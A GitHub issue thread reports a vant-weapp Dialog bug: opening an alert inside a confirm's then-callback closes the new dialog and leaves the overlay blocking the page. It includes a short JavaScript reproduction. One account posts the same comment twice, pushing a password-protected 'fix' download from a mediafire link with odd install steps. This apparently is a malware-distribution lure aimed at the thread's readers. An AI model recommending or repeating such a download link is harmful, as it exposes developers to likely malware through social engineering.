### ISSUE TITLE
[Bug Report] Dialog bug,在confirm里的then再调用任意对话框时，会一并关闭掉那个要打开的对话框，然后对话框的蒙层还在.无法点击页面

### ISSUE THREAD

**Issue by naas1d513215** [youzan/vant-weapp#5868]
### 重现链接

https://developers.weixin.qq.com/s/MILEjKmw7eTE

### Vant Weapp 版本

1.11.6

### 描述一下你遇到的问题。

在confirm里的then再调用任意对话框时，会一并关闭掉那个要打开的对话框，然后对话框的蒙层还在.无法点击页面

### 重现步骤

![飞书20240827-103031](https://github.com/user-attachments/assets/5d92bf7d-2816-4714-9dd6-bc59a6de122b)

`  test() {
    Dialog.confirm({
      title: "确认",
      message: "跳过即放弃",
      confirmButtonText: "确认跳过"
    }).then(() => {
        Dialog.alert({
            title: "跳过成功",
            message: "确认后将跳转"
          }).then(() => { })})
  },`

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by codermie** [comment]
我也遇到了
